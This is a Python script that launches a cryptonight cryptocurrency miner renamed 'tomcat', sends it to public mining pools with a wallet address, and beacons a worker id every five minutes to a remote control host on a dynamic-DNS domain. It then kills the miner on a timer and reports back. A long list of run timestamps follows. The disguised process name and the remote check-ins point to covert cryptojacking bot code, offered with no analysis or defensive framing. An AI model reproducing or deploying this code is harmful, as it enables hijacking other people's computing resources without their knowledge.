import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:38:07.829390
#2018-02-17 16:23:07.218839
#2018-02-17 18:11:03.313339
#2018-02-17 19:58:04.182219
#2018-02-17 21:46:04.255217
#2018-02-17 23:31:06.402435
#2018-02-18 01:19:05.967349
#2018-02-18 03:06:05.901377
#2018-02-18 04:54:06.350461
#2018-02-18 06:47:06.978738
#2018-02-18 08:36:07.246857
#2018-02-18 10:22:05.435098
#2018-02-18 12:08:04.289213
#2018-02-18 13:53:03.234218
#2018-02-18 15:44:02.242763
#2018-02-18 17:35:05.915121
#2018-02-18 19:23:03.818406
#2018-02-18 21:08:07.051294
#2018-02-18 22:56:06.711015
#2018-02-19 00:45:07.921044
#2018-02-19 02:32:05.579807
#2018-02-19 04:18:01.266457
#2018-02-19 06:02:05.158543
#2018-02-19 07:50:04.478965
#2018-02-19 09:40:09.537802
#2018-02-19 11:29:05.500375
#2018-02-19 13:16:07.186174
#2018-02-19 15:05:05.916849
#2018-02-19 16:52:07.964861
#2018-02-19 18:40:07.377332
#2018-02-19 20:26:01.862608
#2018-02-19 22:13:05.330368
#2018-02-19 23:59:06.391135
#2018-02-20 01:46:04.977127
#2018-02-20 03:33:07.873768
#2018-02-20 05:20:07.727678
#2018-02-20 07:04:05.160881
#2018-02-20 08:49:05.023483
#2018-02-20 10:33:05.183145
#2018-02-20 12:18:04.600477
#2018-02-20 14:07:04.331098
#2018-02-20 15:51:07.641554
#2018-02-20 17:39:06.410148
#2018-02-20 19:29:07.244841
#2018-02-20 21:17:05.276488
#2018-02-20 23:03:07.963469
#2018-02-21 00:50:06.379691
#2018-02-21 02:39:05.525638
#2018-02-21 04:27:07.671445
#2018-02-21 06:15:08.836773
#2018-02-21 08:01:05.419104
#2018-02-21 09:46:06.144091
#2018-02-21 11:36:04.760688
#2018-02-21 13:25:05.166137
#2018-02-21 15:10:01.960409
#2018-02-21 16:59:17.590449
#2018-02-21 18:48:05.359370
#2018-02-21 20:34:07.479564
#2018-02-21 22:20:08.009814
#2018-02-22 00:09:06.965974
#2018-02-22 01:56:05.536711
#2018-02-22 03:43:07.843755
#2018-02-22 05:30:03.643475
#2018-02-22 07:15:01.692096
#2018-02-22 09:01:06.662994
#2018-02-22 10:48:13.741904
#2018-02-22 12:36:02.050845
#2018-02-22 14:22:06.728660
#2018-02-22 16:10:05.733354
#2018-02-22 17:55:03.656413
#2018-02-22 19:42:09.363504
#2018-02-22 21:33:05.334962
#2018-02-22 23:21:05.796103
#2018-02-23 01:07:07.490587
#2018-02-23 02:55:04.150736
#2018-02-23 04:43:01.907958
#2018-02-23 06:29:03.926417
#2018-02-23 08:16:02.112580
#2018-02-23 10:32:08.799858
#2018-02-23 12:26:06.296380
#2018-02-23 14:15:06.072791
#2018-02-23 16:07:07.354394
#2018-02-23 17:52:04.023711
#2018-02-23 19:38:05.106548
#2018-02-23 21:21:05.584510
#2018-02-23 23:09:05.671956
#2018-02-24 00:57:07.880097
#2018-02-24 02:52:02.258016
#2018-02-24 04:40:06.737109
#2018-02-24 06:24:06.640617
#2018-02-24 08:12:06.421778
#2018-02-24 09:58:03.204834
#2018-02-24 11:54:07.622344
#2018-02-24 13:44:01.899941
#2018-02-24 15:35:01.491773
#2018-02-24 17:29:04.842259
#2018-02-24 19:17:06.477116
#2018-02-24 21:06:02.230146
#2018-02-24 23:39:06.077869
#2018-02-25 03:40:04.140479
#2018-02-25 07:25:07.220200